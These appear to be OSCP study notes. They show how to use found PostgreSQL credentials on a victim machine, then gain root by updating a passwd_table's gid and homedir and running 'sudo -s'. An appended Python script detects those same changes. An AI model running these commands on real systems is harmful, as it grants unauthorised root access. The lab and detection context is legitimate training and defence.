OSCP Notes

Postgres creds found?

On the victim's machine, run:
psql -d unix -U UserNAME -h localhost
(unix is the database name, UserNAME is the database user.)
Run \dt to show tables.
Run:
select * from table_name;
---
Trick to get root shell:
update passwd_table set gid=0 where gid=1000;
update passwd_table set homedir='/root' where homedir='/var/jail/home';
Then run sudo -s to impersonate the root account.

Run cat /etc/group | grep sudo to verify the gid!
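
Seen from the defending side, the two updates above leave a recognisable trace in the account table. The following is an added example, not part of the original notes: it compares a baseline snapshot of passwd_table with its current rows and flags non-root accounts whose gid or homedir moved to a privileged value. sqlite3 stands in for PostgreSQL so it runs offline; the username and uid columns, the sample rows and gid 27 for sudo are assumptions.

```python
import sqlite3

# Assumed values: 0 = root, 27 = sudo's gid on the constructed sample host
# (check /etc/group on a real one).
PRIVILEGED_GIDS = {0, 27}
PRIVILEGED_HOMES = ("/root",)

def make_db():
    """Constructed sample table; only gid and homedir are named in the notes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE passwd_table "
               "(username TEXT PRIMARY KEY, uid INT, gid INT, homedir TEXT)")
    db.executemany("INSERT INTO passwd_table VALUES (?,?,?,?)", [
        ("root", 0, 0, "/root"),
        ("alice", 1000, 1000, "/var/jail/home"),
        ("bob", 1001, 1001, "/home/bob"),
    ])
    return db

def snapshot(db):
    rows = db.execute("SELECT username, uid, gid, homedir FROM passwd_table")
    return {user: (uid, gid, home) for user, uid, gid, home in rows}

def audit(baseline, current):
    """Return (user, change) pairs for privilege-relevant edits."""
    findings = []
    for user, (uid, gid, home) in sorted(current.items()):
        old = baseline.get(user)
        if old is None:
            findings.append((user, "new account"))
            continue
        if uid != 0 and gid in PRIVILEGED_GIDS and old[1] != gid:
            findings.append((user, f"gid {old[1]} -> {gid}"))
        if uid != 0 and home in PRIVILEGED_HOMES and old[2] != home:
            findings.append((user, f"homedir {old[2]} -> {home}"))
    return findings

def demo():
    db = make_db()
    baseline = snapshot(db)
    # The two UPDATE statements from the notes, replayed on the sample table.
    db.execute("UPDATE passwd_table SET gid=0 WHERE gid=1000")
    db.execute("UPDATE passwd_table SET homedir='/root' "
               "WHERE homedir='/var/jail/home'")
    return audit(baseline, snapshot(db))

if __name__ == "__main__":
    for user, change in demo():
        print(user, change)
```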